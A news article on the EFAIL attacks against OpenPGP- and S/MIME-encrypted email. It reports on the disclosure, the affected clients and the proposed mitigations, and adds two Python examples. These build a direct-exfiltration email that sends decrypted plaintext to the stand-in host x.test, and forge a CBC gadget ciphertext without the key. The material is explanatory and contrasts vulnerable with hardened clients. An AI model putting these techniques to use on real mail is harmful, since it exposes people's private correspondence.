Emails Encrypted With OpenPGP, S/MIME Vulnerable to New Attacks
Researchers from three universities in Germany and Belgium say they have discovered attack methods that malicious actors can use to read emails encrypted with OpenPGP and S/MIME, though some believe the claims are overblown. The team had initially planned to disclose details on Tuesday morning, but moved publication forward after speculation and leaks by third parties. OpenPGP is an encryption standard often used by individuals and organizations to protect emails and other communications against eavesdropping.
S/MIME (Secure/Multipurpose Internet Mail Extensions) is a standard more commonly used to secure email in enterprise environments. According to the researchers, weaknesses in OpenPGP and S/MIME, and in the email clients that implement them, can be exploited to exfiltrate the plaintext of encrypted emails, including messages the targeted user sent or received in the past. There are two variants of the attack, which the researchers have dubbed EFAIL.
Both require the attacker to first obtain the encrypted emails, whether by intercepting them in transit (man-in-the-middle, MitM), by compromising email accounts, or through compromised SMTP servers. The attacker then manipulates the ciphertext of a harvested email and sends the modified message, wrapped in attacker-controlled HTML, to the original recipient or sender. The first method, direct exfiltration, relies on how the Apple Mail (iOS and macOS) and Mozilla Thunderbird email clients handle multipart messages.
In this attack, the attacker sends the targeted user a specially crafted multipart email with three body parts: an HTML part that opens an element (such as an image tag) whose attribute is left unclosed, the intercepted ciphertext, and a second HTML part that closes the attribute and the element. When the victim's client decrypts the middle part and renders the three parts as a single HTML document, the decrypted text ends up inside the attacker's URL and is sent to the attacker's server as soon as the client fetches the resource. The second method, the CBC/CFB gadget attack, abuses weaknesses in the OpenPGP (CVE-2017-17688) and S/MIME (CVE-2017-17689) specifications: the CFB and CBC modes they use are malleable, so an attacker who knows one block of plaintext can splice chosen plaintext into the message without knowing the key.
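The three-part message described above, modelled in Python as an added example (this is not the researchers' code or any mail client's code). It builds the multipart/mixed email with the standard `email` package, then contrasts a vulnerable client that splices all body parts into one HTML document with a hardened one that renders each part in isolation. The collection host `x.test`, the mailbox addresses and the XOR stand-in for S/MIME decryption are placeholders; a real client would unwrap the session key with the victim's private key at that step.

```python
import email
import re
from email.message import EmailMessage
from email.policy import default

ATTACKER_URL = "http://x.test/"      # hypothetical collection server (placeholder name)


def build_direct_exfil_mail(intercepted_blob: bytes) -> bytes:
    """Attacker side: wrap the victim's own ciphertext in two HTML parts.

    Part 1 opens an <img> whose src attribute is never closed, part 2 is the
    intercepted S/MIME body reused verbatim, part 3 closes the attribute and tag.
    """
    msg = EmailMessage(policy=default)
    msg["From"] = "attacker@x.test"      # placeholder addresses
    msg["To"] = "victim@corp.test"
    msg["Subject"] = "Re: Q3 invoice"
    msg.make_mixed()

    opener = EmailMessage(policy=default)
    opener.set_content(f'<img src="{ATTACKER_URL}', subtype="html")

    stolen = EmailMessage(policy=default)
    stolen.set_content(intercepted_blob, maintype="application", subtype="pkcs7-mime",
                       params={"smime-type": "enveloped-data", "name": "smime.p7m"})

    closer = EmailMessage(policy=default)
    closer.set_content('">', subtype="html")

    for part in (opener, stolen, closer):
        msg.attach(part)
    return msg.as_bytes()


def part_types(raw: bytes) -> list:
    """Content types of the top-level MIME parts, in order."""
    return [p.get_content_type()
            for p in email.message_from_bytes(raw, policy=default).iter_parts()]


def _decoded_parts(raw: bytes, decrypt):
    """Victim side: yield every body part as text, decrypting S/MIME parts."""
    for part in email.message_from_bytes(raw, policy=default).iter_parts():
        body = part.get_content()                 # str for text/*, bytes for application/*
        if part.get_content_type() == "application/pkcs7-mime":
            body = decrypt(body).decode()         # the step that needs the victim's private key
        yield body


def vulnerable_client(raw: bytes, decrypt) -> str:
    """The behaviour EFAIL abuses: all parts are spliced into ONE HTML document,
    so the plaintext lands inside the opener's unterminated src attribute."""
    return "".join(_decoded_parts(raw, decrypt))


def hardened_client(raw: bytes, decrypt) -> list:
    """Each part becomes its own document, so markup cannot span the ciphertext."""
    return list(_decoded_parts(raw, decrypt))


def outbound_requests(html: str) -> list:
    """URLs an HTML renderer would fetch for <img src="..."> (newlines are kept;
    a browser engine would percent-encode them)."""
    return re.findall(r'src="([^"]*)"', html)


# Stand-in for the S/MIME envelope: NOT a cipher, just a reversible byte mask so
# the example runs offline.  The MIME structure is what this example is about.
def toy_encrypt(data: bytes) -> bytes:
    return bytes(b ^ 0x5A for b in data)


toy_decrypt = toy_encrypt


def demo():
    """Returns (URLs the vulnerable client fetches, URLs the hardened client fetches)."""
    secret = b"Wire 10k EUR to account DE00 1234 5678 today."   # constructed plaintext
    raw = build_direct_exfil_mail(toy_encrypt(secret))          # attacker captured this blob
    leaked = outbound_requests(vulnerable_client(raw, toy_decrypt))
    safe = [u for doc in hardened_client(raw, toy_decrypt) for u in outbound_requests(doc)]
    return leaked, safe


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable client requests:", leaked)
    print("hardened client requests:  ", safe)
```

The vulnerable client issues one request whose path is the victim's decrypted text; the hardened client issues none, because the opener's quote is never closed inside its own document. Not rendering HTML at all, as the page recommends below, removes the channel entirely rather than relying on part isolation.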
In both cases the victim needs to be in possession of their private key - the method cannot be used to recover encrypted messages if the private key has been lost. "Once [the victim] opens the email in his client, the manipulated ciphertext will be decrypted - first the private key of the victim is used to decrypt the session key s, and then this session key is used to decrypt the manipulated ciphertext c. The decrypted plaintext now contains, due to the manipulations, an exfiltration channel (e.g., an HTML hyperlink) that will send the decrypted plaintext as a whole or in parts to the attacker," researchers wrote in their paper on EFAIL.
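The CBC gadget that the quoted passage describes, carried through in Python as an added example (not the researchers' code). Because the trick depends only on how CBC chains blocks, a small Feistel cipher built from HMAC-SHA256 stands in for AES; the session key, IV, message and the `x.test` collection host are constructed placeholders, and the asymmetric step that unwraps the session key is left out. The attacker knows the first plaintext block (an S/MIME body predictably starts with a Content-Type header), never learns the key, and still produces a ciphertext that decrypts, with valid padding, to attacker-chosen HTML around the victim's plaintext.

```python
import hashlib
import hmac

BLOCK = 16


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


# Toy 128-bit block cipher: 4-round Feistel network with an HMAC-SHA256 round function.
# It stands in for AES only so the example runs offline; the gadget never depends on it.
def _round(key: bytes, i: int, half: bytes) -> bytes:
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:8]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for i in range(4):
        left, right = right, xor(left, _round(key, i, right))
    return left + right


def block_decrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for i in reversed(range(4)):
        left, right = xor(right, _round(key, i, left)), left
    return left + right


def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """CBC with PKCS#7 padding, as an S/MIME sender would use it."""
    pad = BLOCK - len(plaintext) % BLOCK
    data = plaintext + bytes([pad]) * pad
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        prev = block_encrypt(key, xor(data[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    """Victim side: P_i = D(C_i) XOR C_{i-1}.  Padding is checked, but nothing
    authenticates the ciphertext, which is the whole problem."""
    out, prev = [], iv
    for i in range(0, len(ciphertext), BLOCK):
        cur = ciphertext[i:i + BLOCK]
        out.append(xor(block_decrypt(key, cur), prev))
        prev = cur
    data = b"".join(out)
    pad = data[-1]
    if not 1 <= pad <= BLOCK or data[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad padding")
    return data[:-pad]


def forge_ciphertext(iv, ct, known_p0, opening, closing):
    """Attacker side, no key needed.  With P0 known, D(C0) = IV XOR P0, so the
    pair (X, C0) with X = D(C0) XOR chosen decrypts to `chosen` wherever it is
    placed; the block decrypted right before each gadget is unpredictable garbage.
    Resulting plaintext layout:
        opening[0], G, opening[1], ..., G, opening[-1], P1..Pn, G, closing[0], G, ...
    P0 is sacrificed (it was known anyway) so that C0 can feed C1 directly."""
    c0 = ct[:BLOCK]
    d_c0 = xor(iv, known_p0)                   # == D(C0), derived without the key
    gadget = lambda chosen: xor(d_c0, chosen)  # X such that D(C0) XOR X == chosen
    new_iv = gadget(opening[0])                # first gadget uses the IV slot: no garbage before it
    forged = bytearray(c0)
    for chosen in opening[1:]:
        forged += gadget(chosen) + c0
    forged += ct[BLOCK:]                       # C1..Cn decrypt correctly because C0 precedes C1
    for chosen in closing:
        forged += gadget(chosen) + c0
    return new_iv, bytes(forged)


def demo():
    """Returns (original plaintext, what the victim's client decrypts and renders)."""
    key = hashlib.sha256(b"constructed session key").digest()[:16]
    iv = hashlib.sha256(b"constructed iv").digest()[:16]
    secret = (b"Content-Type: text/plain\r\n\r\n"
              b"Wire 10k EUR to account DE00 1234 5678 today.\r\n")   # constructed message
    intercepted = cbc_encrypt(key, iv, secret)
    known_p0 = b"Content-Type: te"                 # guessed from MIME conventions
    opening = [b'<img ignore="   ',                # the garbage block lands in a dummy attribute
               b'" src="//x.test/']               # ...then the victim's plaintext becomes the URL
    closing = [b'">' + bytes([14]) * 14]           # closes the tag AND carries valid PKCS#7 padding
    new_iv, forged = forge_ciphertext(iv, intercepted, known_p0, opening, closing)
    return secret, cbc_decrypt(key, new_iv, forged)


if __name__ == "__main__":
    secret, rendered = demo()
    print(rendered)
```

Each gadget costs one garbage block, which is why the chosen blocks are arranged so the garbage falls inside a throwaway attribute or inside the URL path; a garbage block that happens to contain a quote character breaks the tag, so the attack is probabilistic even for S/MIME, and OpenPGP's compression of the plaintext makes a known first block harder to come by, which is behind the lower success rate the page reports for PGP.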
The researchers say the direct exfiltration technique works reliably against both PGP and S/MIME, while the CBC/CFB gadget attack succeeds against PGP in roughly one in three attempts; they expect the gadget attack to become more efficient against PGP as further research is done. EFAIL is reported to work against 25 of 35 tested S/MIME email clients and 10 of 28 tested OpenPGP clients.
As the researchers announced their intention to disclose the vulnerabilities, the EFF published a blog post telling users to "immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email" and to use alternatives such as Signal for secure communications. However, some in the industry consider the EFF's alert and the researchers' claims overblown, noting that the attacks stem from how email clients handle PGP and HTML rather than from PGP itself, and that they can be mitigated by not rendering HTML in incoming email. Cryptography expert Matthew Green believes EFAIL poses a bigger risk to enterprises that use S/MIME, describing the attack on that standard as "straightforward."
The medium-term mitigations proposed by the researchers are patches from email client developers, though they caution that the fixes implemented by each vendor "may or may not prevent the attacks." As a long-term mitigation, they believe the OpenPGP and S/MIME standards themselves will need to change.